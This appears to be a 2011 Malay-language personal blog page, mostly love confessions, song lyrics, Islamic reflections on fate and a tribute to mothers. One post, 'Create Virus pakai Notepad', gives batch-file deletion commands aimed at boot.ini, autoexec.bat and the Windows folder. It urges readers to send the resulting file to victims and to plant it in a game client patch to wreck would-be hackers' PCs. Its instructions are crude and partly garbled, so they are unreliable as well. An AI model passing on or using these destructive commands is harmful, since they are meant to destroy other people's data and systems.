Followers

Friday, March 25, 2011

DUDUK DIAM SUDA :D

SILA TEKAN CTRL + A

Bila belum siap melangkah lebih jauh dengan seseorang, cukuplah cintai dia dalam diam..
kerana diammu adalah salah satu bukti cintamu padanya...
kau ingin memuliakan dia, dengan tidak mengajaknya menjalin hubungan yang terlarang,
kau tak mahu merosak kesucian dan penjagaan hatinya..
kerana diammu...
itu dapat memuliakan kesucian diri dan hatimu..
menghindarkan dirimu dari hal- hal yang akan merosak izzah dan iffahmu..
kerana diammu...
itu dapat menunjukkan bukti kesetiaanmu padanya..
kerana mungkin saja orang yang kau cinta adalah juga orang yang telah ALLAH SWT.pilihkan untukmu...
ingatkah kalian tentang kisah Fatimah dan Ali?
yang keduanya saling memendam apa yang mereka rasakan...
tapi pada akhirnya mereka dipertemukan dalam ikatan suci nan indah
sahabat...
kerana dalam diammu tersimpan kekuatan..
kekuatan harapan...hingga mungkin saja Allah akan membuat harapan itu menjadi nyata hingga cintamu yang diam itudapat berbicara dalam kehidupan nyata...
bukankah Allah tak akan pernah memutuskan harapan hamba yang berharap padanya?
dan jika memang 'cinta dalam diammu' itu tak memiliki kesempatan untuk berbicara di dunia nyata,
biarkan ia tetap diam...
kerana...
jika dia memang bukan milikmu, dengan izin Allah , melalui waktu akan menghapus 'cinta dalam diammu' itu dengan memberi rasa yang lebih indah dan orang yang tepat untukmu...
biarkan 'cinta dalam diammu' itu menjadi memori tersendiri dan sudut hatimu menjadi rahsia antara kau dengan Sang Pemilik hatimu...
kerana yakinlah...
Allah akan memberikan ganti yang lebih baik lagi atau mewujudkan mimpimu di kemudian hari..
bersabarlah dalam diammu...

Wednesday, March 9, 2011

Makcik jangan la Jual Mahal

asal la aku rasa jeles bila tngk orang laen rapat dgn dia >_< arghhh adakah ini dkatakan jatoh cinta...adoii x ku sangka xku duga btol..pantang tengok orang laen dgn dia..mula rasa xpuas hati..>_< tapi patot ka kalau aku kata dekat dia apa yang aku pendamkan dalam hati ini?

tapi sekarang nie aku dah penat tambah putus asa dgn dia aku rasa macam terhegeh2 pulak kat dia..tak taw la pulak bagi pihak dia..adoii kenapa la mesti muncul saat2 macam nie time aku nak spm pulak..adess kalau dia trima xpa la alhamdulillah la belajaq pon tenang dan bahagia ..tpi kalau sebaliknya..mau frust menonggeng..sekarang nie aku dah penat tunjuk interest aku kat dia..payah kalau dok jual mahal sngt..p cari kedai laen lagi senang..tapi mana bole!! kedai laen mia kualiti dgn kedai nie mia kualiti jaoh beza..kualiti yg dicari baru lekat kat hati ^__^ bak kata sudirman mia lagu la..hero x putus asa..so aku cuba sedaya upaya xnak putus asa walaupon banyak ujian dan bencana alam yg menimpa..

rasa macam cinta SS pon ada jgak..korang taw SS tu natang apa? SS nie ialah spesis perasaan yg diberi nama syok sendiri..atau dalam bahasa saintifiknya ialah cinta yang bertepuk sebelah tangan...

alang2 dok cakap nie meh nak buat luahan hati skit..hang la punca aku hidop bahagia bila ada connection dgn hang tnpa hang aku resah ..aku xley dok diam mia..macam kera kena blacan..pertama kali aku usya hang sayunya hatiku merindui diri mu..pastu terbayang la dlam fikiran..kalau kawin sure aman bahagia..tapikan malu rasanya ooww bila nak kata apa yang aku rasa nie kat hang..mana nak taw t kena reject..haha tapi sedaq arr jgakkan aku xla sehandsome jantan yang korang idamkan sebab aku taw aku bukan jantan tapi aku lelaki ^__^

tapikan!! nak buat macam mana..hang sendiri kata kat aku..sorry I xnak kaple2..adoyai awai2 memang frust la sbb kata mcam tu..tapi aku xkata pon aku nak couple dgn dya! yg gedik sngt awat..tapi xpa aku suka ^__^ haha kalau ada jodoh la kan..aku nak sehidop semati dgn hang shingga ke anak cucu..orang putih kata u jump i jump..owhh tidak aku xkan buat mcam tu..kalau dua2 jump anak2 sapa nak jaga..hahaha tngk xkawin lagi dah pikiaq smpai ke sana dah..tpi btoi x apa yang aku kata tu..gila kalau 2dua jump..ingt kat titanic kot..titanic xpa la terjon masok laut..nie kalau terjon masok neraka tros :D orang putih nie cakap mai semboq ja..haha jom debat jom :D
  ok2 smbong kat cita asal dia..hahaha aku nak gtaw kat hang tapi aku nie ada satu penyakit yang diberi nama oleh pakar2 mua la..depa kata penyakit aku nie penyakit malu nak cakap..so hang jgn la ingt aq xmo kata kat hang perasaan aku mua nie..so aku harap kan one day kita bina mahligai syahdu..macam istana menanti..ehhh istana menanti xbest..pastu wujud ka? haha aq nak create istana aku la nama dya istana aku ^__^ sampai sini saja aku mampu cita sebab aku xtau nak kata apa dah..

kisah cinta kita

I JUST NEED SOMEBODY TO LOVE . Awak jugak yang kata NEVER SAY NEVER . Tapi awak tetap kata tidak pada cinta saya . You are MINE . Awak suka tengok cerita ENCHANTED. Lagu cerita 2 yang tajuk dia THAT'S HOW YOU KNOW 2 , awak selalu hafal . Lepas tu , bila saya bergaduh dengan awak , awak tanya siapa saya . Lepas tu , saya jawab THIS IS ME . Saya selalu ingat kakak saya , SOFEA JANE CINTA SEMPURNA , jangan gadoh2 . Saya selalu kata dekat awak TOLONG INGATKAN AKU supaya beli kicap jalen yang sedap 2 . Dan sebenarnya , gambar2 dekat facebook yang saya letak 2 , saya selalu tulis MEMORI TERCIPTA sebab semua gambar 2 pasal kita berdua pergi New Zealand , Amerika dan France . Saya akan jadikan masa kita bersama sebagai KENANGAN TERINDAH '
kata , kalau nak sebuah

Andai kau tahu

Andainya dia tahu dalam hati ini ada naluri untuk disayangi, ada rasa ingin diberi perhatian, ada rasa untuk didengari keluh kesahnya, ada waktu-waktu minta ditemani kesedihan.. andainya dia tahu Rajuk ku ini minta dipujuk, Marah ku ini perlu didekati, Sedih ku ini harus didengari, gembira ku ini ingin dikongsi..andainya dia tahu di sebalik seribu satu rasa itu ada sekeping hati nan lembut  untuk ditatang bagai minyak yang penuh, jua untuk dimanjai, dan perlu sepenuh perhatian agar rasa kasih itu terasa wujud walau saat berjauhan..kerana andainya dia tahu hati ini akan senantiasa bertanya pada diri ini wujudkah cinta itu di hatinya?bila saat jauh tanpa perkhabaran sebagaimana mekarnya cinta itu tetap di hati ku ini..biarpun ombak yang merubah pantai kasihku takkan hancur berderai

Tuesday, March 8, 2011

Luahan Hati Terluka



Pertama kali ku bertemu dengarmu
Sayunya hatiku merindui dirimu
Walaupun baru kita bersua muka
Namun aku telah jatuh cinta

kini ku telah jatuh cinta padamu
Suara mu yang merdu membuat aku rindu
Alangkah sedih dan kecewanya aku
Bila engkau mempermainkan cintaku

Akan ku renang lautan yang berapi
Membuktikan kehebatannya cinta ini
Tetapi jikalau kau meninggalkan aku
Terhiris hati ini, terguris jiwa ini
Menangis tk berlagu...
Ohhh...

Kerana kecewa hidupku merana
Dan bila ku tahu kau sudah berpunya
Kau membuatku percayakanmu
Sehingga aku ditipu
Ohhh...
 
Sayangku pimpinkan tanganmu
Menuju mahligai bahgia
Kita bersama nikmati kisah cinta
Hidup bagaikan di syurga...
Oh kasih...

Ku ditinggalkan setelah dilukai
Kau membuatku tak mahu bercinta lagi
Mengapa sayang kau buat ku begini
Terluka hati ini pabila sebenarnya
Cintaku dikhianati

Biarpun ombak yang merubah pantai
Kasihku takkan hancur berderai
Biarpun hari berganti hari
Dirimu tetap ku nanti

Kasihku jujurlah padaku
Jikalau tak cintakan ku
Cukuplah sudah kau mempersiakan ku
Pergilah dari hidup ku
Ohh kasih..

Allah nie x Adil?



Iblis diciptakan allah kan..pastu takdir dia tue semua pon allah yang tetapkan..jadi orang bukan islam tanya aku nie,mana allah ADIL?? Sbb takdir dia allah yang tetapkan,pastu akhirnya allah gak yang tetapkan neraka untuk dia sbb takdir ni allah yang buat..so iblis mana ada pilihan?? Iblis lak jadi mangsa ciptaan Pencipta dia sendiri..mana allah adil camnie?? So cmna nak jawab orang bukan islam nie??



apa korang nak jawab kalau orang tanya macam nie?? aku bukan nak tunjuk hebat la..tapi ini la soalan yang kerap ditujukan kat aku oleh orang kafir dkat sekolah aku..so jom kita hayati jawapan aku nie..



allah yang tetapkan itu.. nama dia qada dan qadar. Qada dan qadar ialah ketetapan Allah yang telah ditentukan sejak dari azali lagi berdasarkan ilmuNya yang Maha Tinggi, disusuli dengan kejadian seperti mana yang telah ditetapkan..contoh macam kejadian siang dan malam..bila jadi siang bila jadi malam bole korang semua ubah kejadian siang dan malam hakikat nie xdapat diubah sampai bila-bila.Allah menetapkan kaum hawa dan bukannya kaum adam untuk mengandung dan melahirkan anak dan benda ini pon xdapat diubah smpai kiamat..Allah menetapkan mata untuk melihat dan mulut untuk berkata..Allah menetapkan setiap yang hidup pasti akan mati..lalala~pakar perubatan pon xley nak tukar ketetapan nie..
iblis ini pada awalnya dia duduk kat mana? Syurgakan..dia diangkat martabat dia menjadi ketua malaikat.
.then al kisahnya..Allah mencipta nabi Adam lalu menyeru semua makhluknya sujud hormat kepada nabi Adam tapi Iblis enggan sujud kat nabi Adam..n bagi seribu satu alasan kat Allah..berlaku la perang dingin..pastu Allah murka dengan Iblis lalu mencampaknya kluar dari syurga..lalu Iblis memohon kepada Allah supaya menangguhkan kematiannya sehingga ke hari Kiamat..lalu Allah pon menunaikan permintaan Iblis dan Iblis berjanji akan menyesatkan seluruh keturunan nabi Adam..ok berdasarkan cerita kat atas nie korang Nampak kan yang Iblis xnak dgr perintah Allah..sedangkan kalau dia follow perintah Allah sudah tentu dia tidak di laknat Allah sedangkan dia bole memikirkan yang mana buruk yang mana baik..

Takdir mempunyai beberapa bahagian, pertama ialah takdir di dalam ilmu Allah yang azali. Ia bermaksud Allah telah mengetahui segala-galanya
sebelum ia benar-benar berlaku. Takdir di dalam bentuk ini tidak boleh dan tidak mungkin berubah secara mutlak. Jika ia berubah ia mencacat
kesempurnaan Allah dan hal ini adalah mustahil di sisi Allah. Berhubung dengan ini Allah berfirman:
"Keputusan di sisiKu tidak akan berubah dan Aku sekali-kali tidak menzalimi
hamba-hambaKu." (Surah Qaaf ayat 29)

Takdir ini dikenali sebagai qada mubram atau 'takdir yang pasti' dan

mengingkarinya akan menyebabkan seseorang menjadi kafir mengikut ijmak ulama.

Takdir yang kedua ialah takdir yang tertulis di Lauh Mahfuz dan ia dikenali juga

sebagai takdir mu'allaq. Mengikut K.H. Sirajuddin Abbas di dalam buku 40 Masalah Agama,
takdir ini boleh berubah dari masa ke semasa, sebagai contoh, jika seseorang telah ditakdirkan
hidup hingga ke umor 60 tahun, dan dya sering menghubungkan tali persaudaraan dengan manusia,
Allah mungkin menambah umurnya melebihi 60 tahun. Atau jika seseorang telah ditulis akan memasuki
neraka kemudian di hujung hidupnya dya nie bertaubat dan melakukan amal salih
dengan penuh keikhlasan, berkemungkinan beliau akhirnya akan dimasukkan ke
dalam syurga. Berhubung dengan ini Allah berfirman: "Allah menghapuskan apa
yang Dia kehendaki dan menetapkan apa yang Dia kehendaki dan di sisi-Nya
terdapat Ummul Kitab." (Surah Ar-Ra'd ayat 39)

Imam Baijuri di dalam kitab Tuhfatul Murid Syarh Jauharatut Tauhid berkata:

"Lauh Mahfuz, mengikut pendapat yang hak, menerima penghapusan dan penetapan."
Di antara perkara yang boleh mengubah ketetapan di Lauh Mahfuz ialah doa dan
amalan yang baik, berdasarkan sabda Nabi s.a.w yang bermaksud: "Tiada yang
boleh menolak takdir selain doa dan tiada yang boleh memanjangkan umur kecuali
perbuatan yang baik."



Dalam bab mencari jodoh, nabi sendiri menyuruh kita memilih pasangan yang

betul. Oleh kerana kita disuruh memilih secara yg betul, kita mempunyai
pilihan. Justeru, berusahalah dan dalam konteks perkahwinan berusahalah utk
mencari jodoh berdasarkan landasan agama dan mintalah petunjuk Allah
tentangnya. Allah tidak pernah menzalimi manusia.

 

Saturday, March 5, 2011

fitrah manusia

Orang kata aku lahir dari perut...mak...(bukan org kata...memang betul)


Bila dahaga, yang susukan aku.... mak


Bila lapar, yang suapkan aku.... mak


Bila keseorangan, yang sentiasa di sampingku.. .. mak


Kata mak, perkataan pertama yang aku sebut.... Mak


Bila bangun tidur, aku cari.... mak


Bila nangis, orang pertama yang datang .... mak


Bila nak bermanja, aku dekati...... . mak


Bila nak bergesel, aku duduk sebelah.... mak


Bila sedih, yang boleh memujukku hanya..... mak


Bila nakal, yang memarahi aku.... mak


Bila merajuk, yang memujukku cuma...... mak


Bila melakukan kesalahan, yang paling cepat marah.... mak


Bila takut, yang tenangkan aku.... mak


Bila nak peluk, yang aku suka peluk.... mak


Aku selalu teringatkan ..... mak


Bila sedih, aku mesti talipon..... mak


Bila seronok, orang pertama aku nak beritahu..... mak


Bila bengang.. aku suka luah pada.. mak


Bila takut, aku selalu panggil... "mmaaakkkk!"


Bila sakit, orang paling risau adalah.... mak


Bila nak exam, orang paling sibuk juga.... mak


Bila buat hal, yang marah aku dulu.... mak


Bila ada masalah, yang paling risau.... mak





Yang masih peluk dan cium aku sampai hari ni.....mak


Yang selalu masak makanan kegemaranku. ... mak


kalau balik ke kampung, yang selalu bekalkan ulam, lauk pauk..... mak


Yang selalu simpan dan kemaskan barang-barang aku.... mak


Yang selalu berleter kat aku... mak


Yang selalu puji aku....mak


Yang selalu nasihat aku...... mak


Bila nak kahwin..Orang pertama aku tunjuk dan rujuk..... mak


Aku ada pasangan hidup sendiri....


Bila seronok, aku cari.....pasanganku


Bila sedih, aku cari.....mak


Bila berjaya, aku ceritakan pada....pasanganku


Bila gagal, aku ceritakan pada.... mak


Bila bahagia, aku peluk erat....pasanganku


Bila berduka, aku peluk erat.... emakku


Bila nak bercuti, aku bawa.....pasanganku


Bila sibuk, aku hantar anak ke rumah..... mak


Bila sambut valentine.. Aku bagi hadiah pada pasanganku (eh tak boleh sambut valentine)


Bila sambut hari ibu...aku cuma dapat ucapkan “Selamat Hari Ibu”





Selalu... aku ingat pasanganku


Selalu.. mak ingat kat aku


Bila-bila... . aku akan talipon pasanganku


Entah bila... aku nak talipon mak


Selalu...aku belikan hadiah untuk pasanganku


Entah bila.... aku nak belikan hadiah untuk emak





Renungkan:


"Kalau kau sudah habis belajar dan berkerja...bolehkah kau kirim wang untuk mak? mak bukan nak


banyak... lima puluh ringgit sebulan pun cukuplah".


mak pon bukan nye nak sangat duit kau.....


mak cume nak tengok anak mak je.....


mak cume nak pelok je anak mak.....


mak cume nak cium je anak mak....


Berderai air mata jika kita mendengarnya. ..........


Tapi kalau mak sudah tiada...... .....


MAKKKKK...RINDU MAK..... RINDU SANGAT....


Berapa ramai yang sanggup menyuapkan ibunya......


berapa ramai yang sanggup mencuci muntah ibunya......


berapa ramai yang sanggup mengantikan lampin ibunya.....


berapa ramai yang sanggup membersihkan najis ibunya......


berapa ramai yang sanggup membuang ulat dan membersihkan luka kudis ibunya.....


berapa ramai yang sanggup berhenti kerja untuk menjaga ibunya......


dan akhir sekali berapa ramai yang sembahyang JENAZAH ibunya...... .


Seorang anak mendapatkan ibunya yang sedang sibuk menyediakan makan malam di dapur lalu menghulurkan


sekeping kertas yang bertulis sesuatu. Si ibu segera mengesatkan tangan di apron menyambut kertas yang dihulurkan oleh si anak lalu membacanya. Kos upah membantu ibu:





1) Tolong pergi kedai : RM4.00


2) Tolong jaga adik : RM4.00


3) Tolong buang sampah : RM1.00


4) Tolong kemas bilik : RM2.00


5) Tolong siram bunga : RM3.00


6) Tolong sapu sampah : RM3.00


Jumlah : RM17.00





Selesai membaca, si ibu tersenyum memandang si anak sambil sesuatu berlegar-legar si mindanya. Si ibu


mencapai sebatang pen dan menulis sesuatu di belakang kertas yang sama.


 1) Kos mengandungkanmu selama 9 bulan - PERCUMA


 2) Kos berjaga malam kerana menjagamu - PERCUMA


 3) Kos air mata yang menitis keranamu - PERCUMA


 4) Kos kerunsingan kerana bimbangkanmu - PERCUMA


 5) Kos menyediakan makan minum, pakaian, dan keperluanmu -PERCUMA


 Jumlah Keseluruhan Nilai Kasihku - PERCUMA





Air mata si anak berlinang setelah membaca apa yang dituliskan oleh siibu..


 Si anak menatap wajah ibu,memeluknya dan berkata,


 "Saya Sayangkan Ibu". Kemudian si anak mengambil pen dan menulis "Telah Dibayar" pada mukasurat yang sama ditulisnya

Wednesday, March 2, 2011

Create Virus pakai Notepad

hahaha ok sudah tiba masanya aq share ilmu aku skit dalam nak menjahanamkan pc or laptop orang or comp korang sendiri..haha aq just share ja taw..n klo korang wat n jadi apa2 aq x tnggung ok ^__^ so sblom buat fikir 2-3 kali dulu...hahaha aq masa first time buat..aq mia window xley run n tpaksa format laen lappy aq :(

haha ok jom kita mula rancangan jahat nie..ok first korang buka notepad n tulis natang nie  del c:\boot?ini c:\del autoexec.bat pastu korang save as login.exe. jap korang buat nie dalam C: drive taw ^__^
pastu masok local disk C pastu lepas masok kan righ click , text document pastu nama kan dya TEST.txt haha tu nama file text taw..pastu buka notepad n tulis nie erase C:\TEST.txt pastu save nama dya Test.cmd then lepas save korang run file Test.cmd pastu masok locak disk C n korang akan prasan yg file nama test.txt tu hilang kan ^__^ haha tpi jgn risau xda pa2 lagi..k jom masok part hang bahaya skit ^_^


masok notepad n type  C:\WINDOWS pastu save nama dya findoutaname.cmd ingt JANGAN RUN FILE NIE klo x window map korang aq rosak/hilang ^__^


hahaha lepas siap pa lagi pack la korang mia DAJJAL nie n anta kat sapa2..lepas mangsa korang buka file nie Window map dya nanti kena delete n dya kena install laen window dya :D


p/s : kat sapa2 yg wat private server RYL2 n nak wat protection korang try ikot step nie lepas create virus tu
korang pack kat client..bukan yg kat korang mia file ryl tu nie korang wat kat client patch..pastu sapa2 yg nak hack server korang..hahaha lepas dia(hacker yg nak hack server korang) unpack ja client tu..tngk pc dya nanti boom(rosak)  tros

sekian wabilah hitaufik walhidayah..jangan hisap pit jgn buat jenayah..Assalamualaikum...wey klo korang mia pc rosak jgn cari aq taw..bab aq xbtnggung jawab pon...nak buat atas kehendak masing2 n pikir dulu sblom buat..sesal dulu pendapatan sesal kemudian padan muka ^__^

Tuesday, March 1, 2011

Ishhh orang sekarang nie pantang ja tngk orang nak pakai apa mua..ehhh xstyle la baju tu..ehhh muram la colour dya..ehhh labuh la sluaq nie ehhh nmp mcam mak cik la..ehhh itu ehhh ini bkan ka kat pakaian tpi hal2 laen pn ada..korang asyik complain ja penah x korang tngk niat seseorang tu? Jap jgan salah anggp plak apa yg aq kata dkat si complain nie..aq xsalahkan dya sebab manusia sentiasa buat silap kan^__^

Ok contoh si dya nie pakai t-shirt sendat..korang kata waaa style la awek nie cun..tip-top kot :D n bila korang tngk sorang lagi plak..gaya pemakaian dya tudung labuh..xda ketat2 korang kata isshh minah nie tunjuk alim la pulak..padahal dok mgata blkgn2 wat mcam org xtahu..ha!! tngk nie la budaya orang kat Malaysia nie..budak zaman sekarang..perangai pelik orang kata hdoh dya pndang semua cantik xcerdik mana pergi rasa segan?

Ok katakana lah ada sorang kafir yg baru masok islam..cewahhh dulu sikit mia seksi lagi n lepas dya convert msok islam dya dah xpkai lagi yg seksi2 semua dya katop..korang mula la nak kutuk dya..ciss baru pelok islam dah nak over..buat trok..aq yg islam dari kecik xda pon mcam nie…ha dah dpat satu dosa..klo  si mualaf tu dgr nak buat mcam mana?..kang kecik aty plak n xpasai2 tnggal kan islam..btmbh la lagi dosa korang..taw taka q ada sorang kawan yg parents dya mualaf..seyes aq kata..ilmu agama dya tip-top dya ley bidas semua soalan yg diajukan oleh orang kafir..

So pada pandangan aq kan..apa salahnya kalau korang galakkan dya nak pakai jubah ka tudung labuh ka..baju kurung ka..or bnda2 yg elok la..dpt pahala lagi ada la..mencegah kemungkaran btoi x? ^__^ so kalo ada kawan2 ka anak2 ka..abang or kakak ka yg try nak berubah nak jadi baik..korang patot sokong dya.beri dya smgat skit..tapi kan ada jgak yg jenis mankaq mia style..pakai labuh2 tudung la n apa la..tpi pakai bkan semata2 utk Allah tpi just nak cover kesilapan..haprak mia orang..

Satu lagi..aq bukan nya nak kutok arr apa..zaman skrg nie..ramai aq tngk cara diaorang nak pikat pompuan dgn cara buat alim..wey come on la bro..xda jalan laen ka..owhh skit2 suro istifar..skit2 insyaallah..skit2 suro amek ayaq semayang..sblom korang nak suro org laen buat..korang buat ka pa yg korang cakap tu…ha ley masok gang Munafik taw x…cewaaahh mesti korang kata ehhh blog nie bangang la tunjuk alim plak…ha korang xsuka blah arr..wat pa baca kan..tpi aq nak gtaw nie..aq buat nie..kira mcam nak bgi nasihat n support  la..aq taw ilmu aq xtinggi sama korang..so pelan pelan kayuh arr..tapi setiap kali buat baik mesti kena tindas mia..ultraman btoi..so akhir kata jgn la tindas kalau seseorang tu nak buat bnda baik..^__^
Related Posts Plugin for WordPress, Blogger...